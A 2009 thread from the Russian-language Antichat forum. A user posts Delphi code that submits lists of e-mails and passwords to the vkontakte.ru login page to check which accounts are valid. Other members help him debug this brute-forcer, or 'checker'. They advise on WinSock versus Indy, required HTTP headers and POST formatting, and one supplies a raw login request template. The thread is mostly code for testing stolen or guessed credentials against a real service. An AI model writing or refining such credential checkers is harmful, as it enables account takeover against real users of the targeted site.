ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.08.2009, 22:38
|
|
Познающий
Регистрация: 21.11.2008
Сообщений: 36
Провел на форуме:
117394
Репутация:
6
|
|
есть еще какаято ошибка всегда пишит правильно даже если не пральный логин с паролем...
только если правильно думает больше програма..
PHP код:
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient,
IdHTTP, StdCtrls;
type
TForm1 = class(TForm)
Button1: TButton;
IdHTTP1: TIdHTTP;
procedure Button1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.Button1Click(Sender: TObject);
var
emails:TStringList;
pass:TStringList;
post:TStringList;
result:String;
i,j:integer;
http:TidHTTP;
begin
emails:=TStringList.Create;
pass:=TStringList.Create;
emails.Add('2345@mail.ru');
pass.Add('23425');
http:=TidHTTP.Create(nil);
http.HandleRedirects:=true;
post:=tstringlist.Create;
for i:=0 to emails.Count-1 do begin
post.Clear;
post.Add('email='+emails.Strings[i]);
for j:=0 to pass.Count-1 do begin
post.Add('pass='+pass.Strings[j]);
result :=http.Post('http://vkontakte.ru/login.php',post);
if pos('logout',result)>0
then
ShowMessage('Не правильно ')
else
ShowMessage('правильно ')
end;
end;
emails.Free;
pass.Free;
http.Free;
post.Free;
end;
end.
|
|
|
09.08.2009, 22:55
|
|
Участник форума
Регистрация: 29.08.2008
Сообщений: 151
Провел на форуме:
1551582
Репутация:
107
|
|
значит всё верно) ибо по программе как раз и получается, что если на странице есть слово "logout", то сообщение - "не правильно"
поменяй местами сообщения и потестируй на валидном и невалидном аккаунтах
|
|
|
|
09.08.2009, 23:04
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
http://forum.antichat.ru/showpost.php?p=788789&postcount=11
|
|
|
|
09.08.2009, 23:08
|
|
Познающий
Регистрация: 21.11.2008
Сообщений: 36
Провел на форуме:
117394
Репутация:
6
|
|
Сообщение от ZdezBilYa
значит всё верно) ибо по программе как раз и получается, что если на странице есть слово "logout", то сообщение - "не правильно"
поменяй местами сообщения и потестируй на валидном и невалидном аккаунтах
всегда пишит правильно даже если не пральный логин с паролем...и даже если правильный..
mailbrush эт не то.. да и сокеты я пока не изучал..
|
|
|
|
09.08.2009, 23:30
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Инди не подходит для написания брутов. WinSock || WinInet - самое оно.
|
|
|
|
09.08.2009, 23:37
|
|
Познающий
Регистрация: 21.11.2008
Сообщений: 36
Провел на форуме:
117394
Репутация:
6
|
|
да мне и этот пойдет мне ведь сразу много не над мыло одновременно а чисто 2 поля под мыло и пасс булет..
прост надо разобраться с этим if pos('logout',result)>0
почему он всегда else выдает то...
|
|
|
|
10.08.2009, 01:36
|
|
Участник форума
Регистрация: 29.08.2008
Сообщений: 151
Провел на форуме:
1551582
Репутация:
107
|
|
Сообщение от Ant1Player
прост надо разобраться с этим if pos('logout',result)>0
почему он всегда else выдает то...
Возможно не хватает обязательных параметров.
Возможно заголовки нужны
Это снифером можно посмотреть
|
|
|
|
10.08.2009, 13:31
|
|
Постоянный
Регистрация: 20.03.2009
Сообщений: 564
Провел на форуме:
991929
Репутация:
395
|
|
Ant1Player не страдай херней.... De-visible и так все уже разжевал в министатейке.
Во первых заголовки HTTP должны быть правельные. User-Agent, Referer, Connection, Content-Type это все важно!
Во вторых данные в пост запросе имеют такой вид:
param1=value1¶m2=value2\r\n\r\n
а как у тебя там в TStringList ? в какой кодировке? в ANSI в UNICODE? может там
param1=value1\nparam2=value2\n ?
В общем для "просто разобратся" тренеруйся на самописной форме...
скачай Denver установи и создай файл
Z:\home\localhost\www\post.php:
PHP код:
<?php
if(empty($_POST)) {
echo "<form method=post><input type=text name=login> <input type=password name=pass></form>"; }
else {
echo $_POST['login'].':'.$_POST['pass']; }
?>
и не мучай людям моск... удаче! |
|
|
|
11.08.2009, 14:18
|
|
Познающий
Регистрация: 17.07.2009
Сообщений: 47
Провел на форуме:
131272
Репутация:
4
|
|
Помоему на сокетах это состряпать проще буит, отснифав пакет когда логинишься на вконтакт... кинул бы линк на другой ресурс, но не хочу выглядеть рекламщиком других ресурсов...
PHP код:
'
POST /login.php HTTP/1.1'+#13#10+
'Host: vkontakte.ru'+#13#10+
'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'+#13#10+
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'+#13#10+
'Accept-Language: ru,en-us;q=0.7,en;q=0.3'+#13#10+
'Accept-Encoding: gzip,deflate'+#13#10+
'Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7'+#13#10+
'Keep-Alive: 300'+#13#10+
'Connection: keep-alive'+#13#10+
'Referer: http://vkontakte.ru/index.php'+#13#10+
'Cookie: remixlang=0; remixchk=5'+#13#10+
'Content-Type: application/x-www-form-urlencoded'+#13#10+
'Content-Length: 42'+#13#10+
#13#10+
'email='+email+'&pass='+pass+
#13#10;
создаёшь процедурку в которой спрашиваешь email и pass, которые походу меняешь если нуна, весь этот код присваиваешь перемеенной типа стринг и шлёшь...
А вообще и тут де то это уже обсуждалось, если мне память не изменяет... и гугл вроде является поисковой системой...
P.S. чекер or checker вконтакте
Последний раз редактировалось mr. ZetRikS; 11.08.2009 в 14:28..
|
|
|
|
12.08.2009, 23:52
|
|
Постоянный
Регистрация: 13.12.2008
Сообщений: 354
Провел на форуме:
1747641
Репутация:
175
|
|
Сообщение от Gar|k
User-Agent, Referer, Connection, Content-Type это все важно!
Не во всех случаях. При GET запросе можно оставить, например, только значение поля Host, но это не рекомендуется делать в реальных проектах.
Сообщение от Gar|k
Во вторых данные в пост запросе имеют такой вид:
param1=value1¶m2=value2\r\n\r\n
Ты ошибаешься: \r\n\r\n - лишние.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
